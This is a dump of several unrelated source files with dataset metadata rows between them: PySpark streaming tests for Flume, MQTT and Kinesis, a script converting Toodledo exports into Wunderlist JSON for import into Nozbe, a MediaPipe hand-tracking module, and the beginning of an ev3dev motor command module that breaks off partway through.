    def _validateResult(self, input, result):
        # Every received event carries the fixed test header plus its body.
        header = {"test": "header"}
        self.assertEqual(len(input), len(result))
        for i in range(0, len(input)):
            self.assertEqual(header, result[i][0])
            self.assertEqual(input[i], result[i][1])
    def _writeInput(self, input, compressed):
        # The receiver may not be listening yet; retry writes until timeout.
        start_time = time.time()
        while True:
            try:
                self._utils.writeInput(input, compressed)
                break
            except:
                if time.time() - start_time < self.timeout:
                    time.sleep(0.01)
                else:
                    raise
    def test_flume_stream(self):
        input = [str(i) for i in range(1, 101)]
        result = self._startContext(len(input), False)
        self._writeInput(input, False)
        self.wait_for(result, len(input))
        self._validateResult(input, result)
    def test_compressed_flume_stream(self):
        input = [str(i) for i in range(1, 101)]
        result = self._startContext(len(input), True)
        self._writeInput(input, True)
        self.wait_for(result, len(input))
        self._validateResult(input, result)
class FlumePollingStreamTests(PySparkStreamingTestCase):
    """Pull-based (polling) Flume stream tests.

    Overrides setUp/tearDown WITHOUT calling super: the base class's per-test
    StreamingContext is deliberately not created; _writeAndVerify builds and
    stops its own context instead."""
    timeout = 20
    duration = 1
    # Flaky-network tolerance: each test is retried up to this many times.
    maxAttempts = 5
    def setUp(self):
        utilsClz = \
            self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
                .loadClass("org.apache.spark.streaming.flume.PollingFlumeTestUtils")
        self._utils = utilsClz.newInstance()
    def tearDown(self):
        if self._utils is not None:
            self._utils.close()
            self._utils = None
    def _writeAndVerify(self, ports):
        """Poll the Flume sinks on *ports*, push data through the JVM harness,
        and assert all events (headers and bodies) arrive."""
        ssc = StreamingContext(self.sc, self.duration)
        try:
            addresses = [("localhost", port) for port in ports]
            dstream = FlumeUtils.createPollingStream(
                ssc,
                addresses,
                maxBatchSize=self._utils.eventsPerBatch(),
                parallelism=5)
            outputBuffer = []
            def get_output(_, rdd):
                for e in rdd.collect():
                    outputBuffer.append(e)
            dstream.foreachRDD(get_output)
            ssc.start()
            # NOTE: "sendDat..." (sic) is the JVM-side method's actual name.
            self._utils.sendDatAndEnsureAllDataHasBeenReceived()
            self.wait_for(outputBuffer, self._utils.getTotalEvents())
            outputHeaders = [event[0] for event in outputBuffer]
            outputBodies = [event[1] for event in outputBuffer]
            self._utils.assertOutput(outputHeaders, outputBodies)
        finally:
            ssc.stop(False)
    def _testMultipleTimes(self, f):
        # Retry *f* up to maxAttempts times before letting the failure escape.
        attempt = 0
        while True:
            try:
                f()
                break
            except:
                attempt += 1
                if attempt >= self.maxAttempts:
                    raise
                else:
                    import traceback
                    traceback.print_exc()
    def _testFlumePolling(self):
        try:
            port = self._utils.startSingleSink()
            self._writeAndVerify([port])
            self._utils.assertChannelsAreEmpty()
        finally:
            self._utils.close()
    def _testFlumePollingMultipleHosts(self):
        # NOTE(review): despite the name this starts a single sink, identical
        # to _testFlumePolling — confirm whether multi-sink coverage was
        # intentionally dropped upstream.
        try:
            port = self._utils.startSingleSink()
            self._writeAndVerify([port])
            self._utils.assertChannelsAreEmpty()
        finally:
            self._utils.close()
    def test_flume_polling(self):
        self._testMultipleTimes(self._testFlumePolling)
    def test_flume_polling_multiple_hosts(self):
        self._testMultipleTimes(self._testFlumePollingMultipleHosts)
class MQTTStreamTests(PySparkStreamingTestCase):
    """MQTT stream tests against the embedded broker in MQTTTestUtils."""
    timeout = 20
    duration = 1
    def setUp(self):
        super(MQTTStreamTests, self).setUp()
        # MQTTTestUtils lives in the mqtt assembly jar; load it through the
        # context classloader.
        MQTTTestUtilsClz = self.ssc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
            .loadClass("org.apache.spark.streaming.mqtt.MQTTTestUtils")
        self._MQTTTestUtils = MQTTTestUtilsClz.newInstance()
        self._MQTTTestUtils.setup()
    def tearDown(self):
        if self._MQTTTestUtils is not None:
            self._MQTTTestUtils.teardown()
            self._MQTTTestUtils = None
        super(MQTTStreamTests, self).tearDown()
    def _randomTopic(self):
        # Random topic name so reruns do not collide with stale broker state.
        return "topic-%d" % random.randint(0, 10000)
    def _startContext(self, topic):
        """Subscribe to *topic* and return the (shared, mutable) list that
        accumulates received messages once the context is started."""
        stream = MQTTUtils.createStream(self.ssc, "tcp://" + self._MQTTTestUtils.brokerUri(), topic)
        result = []
        def getOutput(_, rdd):
            for data in rdd.collect():
                result.append(data)
        stream.foreachRDD(getOutput)
        self.ssc.start()
        return result
    def test_mqtt_stream(self):
        sendData = "MQTT demo for spark streaming"
        topic = self._randomTopic()
        result = self._startContext(topic)
        def retry():
            # Re-publish on every retry; MQTT delivery may lag the subscriber.
            self._MQTTTestUtils.publishData(topic, sendData)
            self.assertTrue(len(result) > 0)
            self.assertEqual(sendData, result[0])
        self._retry_or_timeout(retry)
    def _retry_or_timeout(self, test_func):
        """Keep calling *test_func* until it passes or self.timeout elapses."""
        start_time = time.time()
        while True:
            try:
                test_func()
                break
            except:
                if time.time() - start_time > self.timeout:
                    raise
                time.sleep(0.01)
class KinesisStreamTests(PySparkStreamingTestCase):
    """Kinesis stream tests; the end-to-end test is gated on the module-level
    are_kinesis_tests_enabled flag (set via kinesis_test_environ_var)."""
    def test_kinesis_stream_api(self):
        # Don't start the StreamingContext because we cannot test it in Jenkins
        kinesisStream1 = KinesisUtils.createStream(
            self.ssc, "myAppNam", "mySparkStream",
            "https://kinesis.us-west-2.amazonaws.com", "us-west-2",
            InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2)
        kinesisStream2 = KinesisUtils.createStream(
            self.ssc, "myAppNam", "mySparkStream",
            "https://kinesis.us-west-2.amazonaws.com", "us-west-2",
            InitialPositionInStream.LATEST, 2, StorageLevel.MEMORY_AND_DISK_2,
            "awsAccessKey", "awsSecretKey")
    def test_kinesis_stream(self):
        """End-to-end test against a real Kinesis stream; skipped unless the
        environment explicitly enables it."""
        if not are_kinesis_tests_enabled:
            sys.stderr.write(
                "Skipped test_kinesis_stream (enable by setting environment variable %s=1"
                % kinesis_test_environ_var)
            return
        import random
        kinesisAppName = ("KinesisStreamTests-%d" % abs(random.randint(0, 10000000)))
        # KinesisTestUtils lives in the kinesis-asl assembly jar; load it
        # through the context classloader.
        kinesisTestUtilsClz = \
            self.sc._jvm.java.lang.Thread.currentThread().getContextClassLoader() \
                .loadClass("org.apache.spark.streaming.kinesis.KinesisTestUtils")
        kinesisTestUtils = kinesisTestUtilsClz.newInstance()
        try:
            kinesisTestUtils.createStream()
            aWSCredentials = kinesisTestUtils.getAWSCredentials()
            stream = KinesisUtils.createStream(
                self.ssc, kinesisAppName, kinesisTestUtils.streamName(),
                kinesisTestUtils.endpointUrl(), kinesisTestUtils.regionName(),
                InitialPositionInStream.LATEST, 10, StorageLevel.MEMORY_ONLY,
                aWSCredentials.getAWSAccessKeyId(), aWSCredentials.getAWSSecretKey())
            outputBuffer = []
            def get_output(_, rdd):
                for e in rdd.collect():
                    outputBuffer.append(e)
            stream.foreachRDD(get_output)
            self.ssc.start()
            testData = [i for i in range(1, 11)]
            expectedOutput = set([str(i) for i in testData])
            # Keep re-pushing data for up to two minutes until everything
            # expected has come back through the stream.
            start_time = time.time()
            while time.time() - start_time < 120:
                kinesisTestUtils.pushData(testData)
                if expectedOutput == set(outputBuffer):
                    break
                time.sleep(10)
            self.assertEqual(expectedOutput, set(outputBuffer))
        except:
            import traceback
            traceback.print_exc()
            raise
        finally:
            # Always clean up the remote stream and its DynamoDB lease table.
            self.ssc.stop(False)
            kinesisTestUtils.deleteStream()
            kinesisTestUtils.deleteDynamoDBTable(kinesisAppName)
def search_jar(dir, name_prefix):
    """Return candidate jar paths under *dir* matching *name_prefix*,
    skipping javadoc/sources/tests auxiliary jars."""
    skip_suffixes = ("javadoc.jar", "sources.jar", "test-sources.jar", "tests.jar")
    patterns = [
        os.path.join(dir, "target/scala-*/" + name_prefix + "-*.jar"),  # sbt build layout
        os.path.join(dir, "target/" + name_prefix + "_*.jar"),          # maven build layout
    ]
    candidates = []
    for pattern in patterns:
        candidates.extend(glob.glob(pattern))
    return [path for path in candidates if not path.endswith(skip_suffixes)]
def search_kafka_assembly_jar():
    """Return the path of the single spark-streaming-kafka assembly jar.

    Raises Exception with build instructions when the jar is missing, or when
    more than one candidate jar is found.
    """
    kafka_assembly_dir = os.path.join(os.environ["SPARK_HOME"], "external/kafka-assembly")
    jars = search_jar(kafka_assembly_dir, "spark-streaming-kafka-assembly")
    if len(jars) == 1:
        return jars[0]
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming kafka assembly jar in %s. " % kafka_assembly_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-kafka-assembly/assembly' or "
            "'build/mvn package' before running this test.")
    raise Exception(("Found multiple Spark Streaming Kafka assembly JARs: %s; please "
                     "remove all but one") % (", ".join(jars)))
def search_flume_assembly_jar():
    """Locate the single Spark Streaming Flume assembly jar under $SPARK_HOME.

    Raises Exception when the jar is missing (with build instructions) or
    when more than one candidate is found.
    """
    spark_home = os.environ["SPARK_HOME"]
    assembly_dir = os.path.join(spark_home, "external/flume-assembly")
    jars = search_jar(assembly_dir, "spark-streaming-flume-assembly")
    if len(jars) == 1:
        return jars[0]
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming Flume assembly jar in %s. " % assembly_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-flume-assembly/assembly' or "
            "'build/mvn package' before running this test.")
    raise Exception(("Found multiple Spark Streaming Flume assembly JARs: %s; please "
                     "remove all but one") % (", ".join(jars)))
def search_mqtt_assembly_jar():
    """Locate the single Spark Streaming MQTT assembly jar under $SPARK_HOME.

    Raises Exception when the jar is missing (with build instructions) or
    when more than one candidate jar is found.
    """
    SPARK_HOME = os.environ["SPARK_HOME"]
    mqtt_assembly_dir = os.path.join(SPARK_HOME, "external/mqtt-assembly")
    jars = search_jar(mqtt_assembly_dir, "spark-streaming-mqtt-assembly")
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming MQTT assembly jar in %s. " % mqtt_assembly_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-mqtt-assembly/assembly' or "
            # Trailing period added for consistency with the sibling search_* helpers.
            "'build/mvn package' before running this test.")
    elif len(jars) > 1:
        raise Exception(("Found multiple Spark Streaming MQTT assembly JARs: %s; please "
                         "remove all but one") % (", ".join(jars)))
    else:
        return jars[0]
def search_mqtt_test_jar():
    """Locate the single Spark Streaming MQTT test jar under $SPARK_HOME.

    Raises Exception when the jar is missing (with build instructions) or
    when more than one candidate is found.
    """
    spark_home = os.environ["SPARK_HOME"]
    test_dir = os.path.join(spark_home, "external/mqtt")
    pattern = os.path.join(test_dir, "target/scala-*/spark-streaming-mqtt-test-*.jar")
    jars = glob.glob(pattern)
    if len(jars) == 1:
        return jars[0]
    if not jars:
        raise Exception(
            ("Failed to find Spark Streaming MQTT test jar in %s. " % test_dir) +
            "You need to build Spark with "
            "'build/sbt assembly/assembly streaming-mqtt/test:assembly'")
    raise Exception(("Found multiple Spark Streaming MQTT test JARs: %s; please "
                     "remove all but one") % (", ".join(jars)))
def search_kinesis_asl_assembly_jar():
    """Locate the optional Kinesis ASL assembly jar.

    Returns None when the optional project was not built; raises Exception
    when more than one candidate jar is found.
    """
    spark_home = os.environ["SPARK_HOME"]
    assembly_dir = os.path.join(spark_home, "extras/kinesis-asl-assembly")
    jars = search_jar(assembly_dir, "spark-streaming-kinesis-asl-assembly")
    if not jars:
        return None
    if len(jars) > 1:
        raise Exception(("Found multiple Spark Streaming Kinesis ASL assembly JARs: %s; please "
                         "remove all but one") % (", ".join(jars)))
    return jars[0]
kinesis_test_environ_var = "ENABLE_KINESIS_TESTS"
# Kinesis tests talk to AWS (and can cost money), so they are opt-in.
are_kinesis_tests_enabled = os.environ.get(kinesis_test_environ_var) == '1'

if __name__ == "__main__":
    kafka_assembly_jar = search_kafka_assembly_jar()
    flume_assembly_jar = search_flume_assembly_jar()
    mqtt_assembly_jar = search_mqtt_assembly_jar()
    mqtt_test_jar = search_mqtt_test_jar()
    kinesis_asl_assembly_jar = search_kinesis_asl_assembly_jar()

    # The Kinesis ASL assembly is optional; only add it to --jars when built.
    if kinesis_asl_assembly_jar is None:
        kinesis_jar_present = False
        jars = "%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
                                mqtt_test_jar)
    else:
        kinesis_jar_present = True
        jars = "%s,%s,%s,%s,%s" % (kafka_assembly_jar, flume_assembly_jar, mqtt_assembly_jar,
                                   mqtt_test_jar, kinesis_asl_assembly_jar)

    os.environ["PYSPARK_SUBMIT_ARGS"] = "--jars %s pyspark-shell" % jars
    testcases = [BasicOperationTests, WindowFunctionTests, StreamingContextTests, CheckpointTests,
                 KafkaStreamTests, FlumeStreamTests, FlumePollingStreamTests, MQTTStreamTests]

    if kinesis_jar_present:
        testcases.append(KinesisStreamTests)
    elif not are_kinesis_tests_enabled:
        sys.stderr.write("Skipping all Kinesis Python tests as the optional Kinesis project was "
                         "not compiled into a JAR. To run these tests, "
                         "you need to build Spark with 'build/sbt -Pkinesis-asl assembly/assembly "
                         "streaming-kinesis-asl-assembly/assembly' or "
                         "'build/mvn -Pkinesis-asl package' before running this test.")
    else:
        # Bug fix: kinesis_asl_assembly_dir was a local variable of
        # search_kinesis_asl_assembly_jar() and raised NameError here;
        # recompute the expected location for the error message instead.
        kinesis_asl_assembly_dir = os.path.join(os.environ["SPARK_HOME"],
                                                "extras/kinesis-asl-assembly")
        raise Exception(
            ("Failed to find Spark Streaming Kinesis assembly jar in %s. "
             % kinesis_asl_assembly_dir) +
            "You need to build Spark with 'build/sbt -Pkinesis-asl "
            # Bug fix: adjacent literals previously joined as "...assembly'or",
            # producing a garbled message; a separating space was added.
            "assembly/assembly streaming-kinesis-asl-assembly/assembly' "
            "or 'build/mvn -Pkinesis-asl package' before running this test.")

    sys.stderr.write("Running tests: %s \n" % (str(testcases)))
    for testcase in testcases:
        sys.stderr.write("[Running %s]\n" % (testcase))
        tests = unittest.TestLoader().loadTestsFromTestCase(testcase)
        if xmlrunner:
            unittest.main(tests, verbosity=3,
                          testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
        else:
            unittest.TextTestRunner(verbosity=3).run(tests)
| true | true |
f7fa483194a4be04920b80ded13583a783e3c37f | 2,163 | py | Python | Python/HandTracking/HandTracking_module.py | vermayash7980/Hacktoberfest2021 | 66e190608c5e3f9ad983ba8f707e499ca5bc6da0 | [
"MIT"
] | 39 | 2021-10-03T05:40:26.000Z | 2021-10-31T18:09:23.000Z | Python/HandTracking/HandTracking_module.py | vermayash7980/Hacktoberfest2021 | 66e190608c5e3f9ad983ba8f707e499ca5bc6da0 | [
"MIT"
] | 26 | 2021-10-03T04:50:47.000Z | 2021-10-16T07:39:22.000Z | Python/HandTracking/HandTracking_module.py | vermayash7980/Hacktoberfest2021 | 66e190608c5e3f9ad983ba8f707e499ca5bc6da0 | [
"MIT"
] | 215 | 2021-10-03T04:35:47.000Z | 2021-10-31T17:37:42.000Z | import cv2
import mediapipe as mp
import time
class HandDetector():
    """Detect hands in BGR images via MediaPipe and expose landmark pixels."""

    def __init__(self, mode=False, maxHands=2, detectionCon=0.5, trackCon=0.5):
        """Create the underlying MediaPipe Hands pipeline.

        mode: True for static images, False (default) for a video stream.
        maxHands: maximum number of hands to track.
        detectionCon / trackCon: minimum detection / tracking confidence.
        """
        self.mode = mode
        self.maxHands = maxHands
        self.detectionCon = detectionCon
        self.trackCon = trackCon
        self.results = None  # last detection result; set by findHands()
        self.mpHands = mp.solutions.hands
        # Pass the parameters by keyword: newer mediapipe releases inserted a
        # model_complexity parameter, which silently breaks positional calls.
        self.hands = self.mpHands.Hands(static_image_mode=self.mode,
                                        max_num_hands=self.maxHands,
                                        min_detection_confidence=self.detectionCon,
                                        min_tracking_confidence=self.trackCon)
        self.mpDraw = mp.solutions.drawing_utils

    def findHands(self, img, draw=True):
        """Run hand detection on a BGR image; optionally draw the skeleton.

        Returns the (possibly annotated) image.
        """
        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)  # mediapipe expects RGB
        self.results = self.hands.process(imgRGB)
        if self.results.multi_hand_landmarks:
            for handLms in self.results.multi_hand_landmarks:
                if draw:
                    self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
        return img

    def findPosition(self, img, handNo=0, draw=True):
        """Return [[landmark_id, x_px, y_px], ...] for hand ``handNo``.

        Must be preceded by a findHands() call; returns [] when no hand
        has been detected yet.
        """
        lmList = []
        # Guard: calling this before findHands() used to raise AttributeError
        # because self.results did not exist.
        if self.results and self.results.multi_hand_landmarks:
            myHand = self.results.multi_hand_landmarks[handNo]
            h, w, _ = img.shape  # hoisted out of the loop; shape is constant
            for lm_id, lm in enumerate(myHand.landmark):
                # Landmarks are normalized [0, 1]; convert to pixel coords.
                cx, cy = int(lm.x * w), int(lm.y * h)
                lmList.append([lm_id, cx, cy])
                if draw:
                    cv2.circle(img, (cx, cy), 10, (255, 0, 255), cv2.FILLED)
        return lmList
def main():
    """Webcam demo: draw hand landmarks and an FPS counter until 'q' is pressed."""
    pTime = 0
    cap = cv2.VideoCapture(0)
    detector = HandDetector()
    try:
        while True:
            success, img = cap.read()
            if not success:
                # Camera unavailable or frame grab failed; stop instead of
                # passing None into the detector.
                break
            img = detector.findHands(img)
            lmList = detector.findPosition(img)
            if lmList:
                print(lmList[1])
            cTime = time.time()
            # Guard against a zero time delta on very fast consecutive frames.
            fps = 1 / (cTime - pTime) if cTime != pTime else 0.0
            pTime = cTime
            cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3,
                        (255, 0, 255), 3)
            cv2.imshow("Image", img)
            # The original ignored waitKey's return value, leaving no way to
            # quit; press 'q' to exit cleanly.
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        # Always release the camera and close windows, even on error.
        cap.release()
        cv2.destroyAllWindows()
# Run the webcam demo only when this file is executed directly.
if __name__ == "__main__":
    main()
| 30.9 | 100 | 0.548775 | import cv2
import mediapipe as mp
import time
class HandDetector():
def __init__(self, mode = False, maxHands = 2, detectionCon = 0.5, trackCon = 0.5):
self.mode = mode
self.maxHands = maxHands
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(self.mode, self.maxHands, self.detectionCon, self.trackCon)
self.mpDraw = mp.solutions.drawing_utils
def findHands(self, img, draw = True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def findPosition(self, img, handNo = 0, draw = True):
lmList = []
if self.results.multi_hand_landmarks:
myHand = self.results.multi_hand_landmarks[handNo]
for id, lm in enumerate(myHand.landmark):
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
lmList.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 10, (255, 0, 255), cv2.FILLED)
return lmList
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0)
detector = HandDetector()
while True:
success, img = cap.read()
img = detector.findHands(img)
lmList = detector.findPosition(img)
if len(lmList) != 0:
print(lmList[1])
cTime = time.time()
fps = 1 / (cTime - pTime)
pTime = cTime
cv2.putText(img, str(int(fps)), (10, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (255, 0, 255), 3)
cv2.imshow("Image", img)
cv2.waitKey(1)
if __name__ == "__main__":
main()
| true | true |
f7fa4c08ec747242c9254c959ee137fb898db039 | 5,601 | py | Python | toodledo2nozbe.py | dodiggitydag/Toodledo-To-Nozbe | 5185e1fd1e8e8d0b8d876b1dff8837d04ee1dd01 | [
"CC0-1.0"
] | null | null | null | toodledo2nozbe.py | dodiggitydag/Toodledo-To-Nozbe | 5185e1fd1e8e8d0b8d876b1dff8837d04ee1dd01 | [
"CC0-1.0"
] | null | null | null | toodledo2nozbe.py | dodiggitydag/Toodledo-To-Nozbe | 5185e1fd1e8e8d0b8d876b1dff8837d04ee1dd01 | [
"CC0-1.0"
] | null | null | null | """
Python script to convert Toodledo to Wunderlist backup json file format for
importing into Nozbe.
It is unable to retain the following fields: repeating tasks, timer values,
complex due dates, due times, lengths, locations, goals, statuses, start dates
and times.
Example: python toodledo2nozbe.py toodledo.xml forNozbe.json
Requirements: Python and BeautifulSoup4
Install BeautifulSoup4 using command: pip install BeautifulSoup4
"""
import argparse
import json
from bs4 import BeautifulSoup
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=__doc__,
                                     usage='python toodledo2nozbe.py src_xml_file out_file')
    parser.add_argument('src_xml_file')
    parser.add_argument('out_file')
    args = parser.parse_args()

    # Read the whole export and strip newlines so multi-line note bodies do
    # not confuse the parser.
    with open(args.src_xml_file, 'r') as myfile:
        xml_text = myfile.read().replace('\n', '')

    soup = BeautifulSoup(xml_text, 'html.parser')

    # Wunderlist backup skeleton that Nozbe's importer understands.
    data = {'data': {'lists': [], 'tasks': [], 'subtasks': [], 'notes': [],
                     'task_positions': [], 'subtask_positions': []}}

    # Toodledo folders become Wunderlist lists (imported as Nozbe projects).
    # dict.fromkeys de-duplicates while preserving first-seen order.
    folder_names = dict.fromkeys(folder.text for folder in soup.findAll('folder'))

    listIds = {}
    for list_id, folder_name in enumerate(folder_names, start=1):
        data['data']['lists'].append({"id": list_id, "title": folder_name, "list_type": "list"})
        listIds[folder_name] = list_id

    # Occurrence counters for Toodledo fields with no Wunderlist equivalent;
    # only counted so the user can be warned at the end.
    dictUnsupportedFields = dict.fromkeys(
        ('repeating tasks', 'timer values', 'complex due dates', 'due times',
         'lengths', 'locations', 'goals', 'statuses', 'start dates and times'), 0)

    dictNotes = {}
    for item in soup.findAll('item'):
        t_id = item.id.text
        t_title = item.title.text
        t_folder = item.folder.text
        t_completed = item.completed.text
        t_star = item.star.text
        t_note = item.note.text

        # Folded into the composite task title below because the target
        # format has no dedicated fields for them.
        t_priority = item.priority.text
        t_context = item.context.text
        t_tag = item.tag.text
        t_status = item.status.text

        # NOTE(review): item.duedate is read by the original but never
        # exported; Wunderlist's backup schema may support a due-date field
        # -- confirm the key name before carrying it over.
        t_duedate = item.duedate.text

        # Detect unsupported Toodledo data so it can be reported as dropped.
        unsupported_checks = (
            ('repeating tasks', item.repeat.text != 'None'),
            ('timer values', item.timer.text != '0'),
            ('complex due dates', item.duedatemodifier.text != '0'),
            ('due times', item.duetime.text != ''),
            ('lengths', item.length.text != ''),
            ('locations', item.location.text != ''),
            ('goals', item.goal.text != ''),
            ('statuses', t_status != 'None'),
            ('start dates and times',
             item.startdate.text != "0000-00-00" or item.starttime.text != ''),
        )
        for field_name, present in unsupported_checks:
            if present:
                dictUnsupportedFields[field_name] += 1

        val_starred = t_star == "1"

        # Toodledo marks incomplete tasks with the sentinel date 0000-00-00.
        val_complete = t_completed != "0000-00-00"
        val_completedAt = t_completed + 'T08:00:00.000Z' if val_complete else ''

        if t_note != '':
            dictNotes[t_id] = t_note

        # Build a composite title carrying context/priority/status/tag.
        v_title = t_title
        if t_context != '':
            v_title = "%s %s" % (v_title, t_context)
        if t_priority != '':
            v_title = "-%s %s" % (t_priority, v_title)
        if t_status != 'None':
            v_title = "-%s %s" % (t_status, v_title)
        if t_tag != '':
            v_title = "%s %s" % (v_title, t_tag)

        data['data']['tasks'].append({"id": t_id, "completed": val_complete,
                                      "completed_at": val_completedAt,
                                      "starred": val_starred, "title": v_title,
                                      "list_id": listIds[t_folder]})

    # Attach notes to their tasks.
    for task_id, note in dictNotes.items():
        data['data']['notes'].append({"task_id": task_id, "content": note})

    # Warn the user about data that could not be carried over.
    # (Also fixes the "occurences" typo in the user-facing message.)
    for unsupported_field, count in dictUnsupportedFields.items():
        if count > 0:
            print('WARNING: %s are not supported (%d occurrences).' % (unsupported_field, count))

    # Dump the Wunderlist-format backup file.
    with open(args.out_file, 'w') as outfile:
        json.dump(data, outfile)

    print('Done.')
| 36.848684 | 182 | 0.628102 | import argparse
import json
from bs4 import BeautifulSoup
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__, usage='python toodledo2nozbe.py src_xml_file out_file')
parser.add_argument('src_xml_file')
parser.add_argument('out_file')
args = parser.parse_args()
with open(args.src_xml_file, 'r') as myfile:
data = myfile.read().replace('\n', '')
soup = BeautifulSoup(data, 'html.parser')
data = {}
data['data'] = {'lists': [], 'tasks': [], 'subtasks': [], 'notes': [], 'task_positions': [], 'subtask_positions': []}
x = []
for item in soup.findAll('folder'):
if item.text not in x:
x.append(item.text)
in x:
i = i + 1
data['data']['lists'].append({"id": i, "title": folder_name, "list_type": "list"})
listIds[folder_name] = i
dictUnsupportedFields = {}
dictUnsupportedFields['repeating tasks'] = 0
dictUnsupportedFields['timer values'] = 0
dictUnsupportedFields['complex due dates'] = 0
dictUnsupportedFields['due times'] = 0
dictUnsupportedFields['lengths'] = 0
dictUnsupportedFields['locations'] = 0
dictUnsupportedFields['goals'] = 0
dictUnsupportedFields['statuses'] = 0
dictUnsupportedFields['start dates and times'] = 0
dictNotes = {}
i = 0
for item in soup.findAll('item'):
i = i + 1
t_id = item.id.text
t_title = item.title.text
t_folder = item.folder.text
t_duedate = item.duedate.text
t_completed = item.completed.text
t_star = item.star.text
t_note = item.note.text
t_order = item.order.text
t_parent = item.parent.text
t_priority = item.priority.text
t_context = item.context.text
t_tag = item.tag.text
# not converted into target file
t_duedatemodifier = item.duedatemodifier.text
t_duetime = item.duetime.text
t_goal = item.goal.text
t_length = item.length.text
t_location = item.location.text
t_repeat = item.repeat.text
t_repeatfrom = item.repeatfrom.text
t_startdate = item.startdate.text
t_starttime = item.starttime.text
t_status = item.status.text
t_timer = item.timer.text
if t_repeat != 'None':
dictUnsupportedFields['repeating tasks'] = dictUnsupportedFields['repeating tasks'] + 1
if t_timer != '0':
dictUnsupportedFields['timer values'] = dictUnsupportedFields['timer values'] + 1
if t_duedatemodifier != '0':
dictUnsupportedFields['complex due dates'] = dictUnsupportedFields['complex due dates'] + 1
if t_duetime != '':
dictUnsupportedFields['due times'] = dictUnsupportedFields['due times'] + 1
if t_length != '':
dictUnsupportedFields['lengths'] = dictUnsupportedFields['lengths'] + 1
if t_location != '':
dictUnsupportedFields['locations'] = dictUnsupportedFields['locations'] + 1
if t_goal != '':
dictUnsupportedFields['goals'] = dictUnsupportedFields['goals'] + 1
if t_status != 'None':
dictUnsupportedFields['statuses'] = dictUnsupportedFields['statuses'] + 1
if t_startdate != "0000-00-00" or t_starttime != '':
dictUnsupportedFields['start dates and times'] = dictUnsupportedFields['start dates and times'] + 1
val_starred = False
if t_star == "1":
val_starred = True
val_complete = False
val_completedAt = ''
if t_completed != "0000-00-00":
val_complete = True
val_completedAt = t_completed + 'T08:00:00.000Z'
if t_note != '':
dictNotes[t_id] = t_note
# Build a composite title
v_title = t_title
if t_context != '':
v_title = "%s %s" % (v_title, t_context)
if t_priority != '':
v_title = "-%s %s" % (t_priority, v_title)
if t_status != 'None':
v_title = "-%s %s" % (t_status, v_title)
if t_tag != '':
v_title = "%s %s" % (v_title, t_tag)
data['data']['tasks'].append({"id": t_id, "completed": val_complete, "completed_at": val_completedAt, "starred": val_starred, "title": v_title, "list_id": listIds[t_folder]})
# Add notes to the json data
for taskID in dictNotes.keys():
data['data']['notes'].append({"task_id": taskID, "content": dictNotes[taskID]})
# Warn the user of unsupported fields
for unsupported_field in dictUnsupportedFields.keys():
i = dictUnsupportedFields[unsupported_field]
if i > 0:
print('WARNING: %s are not supported (%d occurences).' % (unsupported_field, i))
# Dump the file
with open(args.out_file, 'w') as outfile:
json.dump(data, outfile)
print('Done.')
| true | true |
f7fa4c71261b9e280dda72cc0e1fb465dab19360 | 1,974 | py | Python | R_ev3dev/motor/motor.py | thomasvolk/R_ev3dev | 53b8c83af49e88eb4766deea0a690c55d1304d6a | [
"Apache-2.0"
] | null | null | null | R_ev3dev/motor/motor.py | thomasvolk/R_ev3dev | 53b8c83af49e88eb4766deea0a690c55d1304d6a | [
"Apache-2.0"
] | null | null | null | R_ev3dev/motor/motor.py | thomasvolk/R_ev3dev | 53b8c83af49e88eb4766deea0a690c55d1304d6a | [
"Apache-2.0"
] | null | null | null | from R_ev3dev.peripheral import BackgroundPeripheralCommand, PeripheralAction
from R_ev3dev.interpreter import Command
from R_ev3dev.ev3 import ev3dev2
class ListMotors(Command):
    """List every motor currently attached to the brick."""

    def invoke(self, interpreter_context, args):
        # Neither interpreter_context nor args is used: the command takes no
        # arguments and reports driver name + port address for each motor.
        return [{'driver_name': m.driver_name, 'address': m.address} for m in ev3dev2.motor.list_motors()]
class On(PeripheralAction):
    """Action that binds a motor instance to an output port.

    The created motor is stored in the action context under the "motor" key
    so subsequent actions (e.g. on_for_rotations) can operate on it.
    """

    def __init__(self, motor_type_factory):
        super().__init__("on")
        self.__motor_type_factory = motor_type_factory

    def invoke(self, context, args):
        port = args[0]
        created = self.__motor_type_factory(port)
        context["motor"] = created
        return created
class OnForRotations(PeripheralAction):
    """Action that runs the context's bound motor for a number of rotations."""

    def __init__(self):
        super().__init__("on_for_rotations")

    def invoke(self, context, args):
        speed_percent = int(args[0])
        rotations = float(args[1])
        motor = context["motor"]
        return motor.on_for_rotations(ev3dev2.motor.SpeedPercent(speed_percent), rotations)
class Motor(BackgroundPeripheralCommand):
    """Common command wiring shared by LargeMotor and MediumMotor.

    Registers two actions: "on", which binds a motor instance to an output
    port, and "on_for_rotations", wrapped in a background proxy so it can
    optionally run without blocking the interpreter.
    """

    def __init__(self, name, motor_type_factory):
        # motor_type_factory: callable mapping an output port (e.g. "outA")
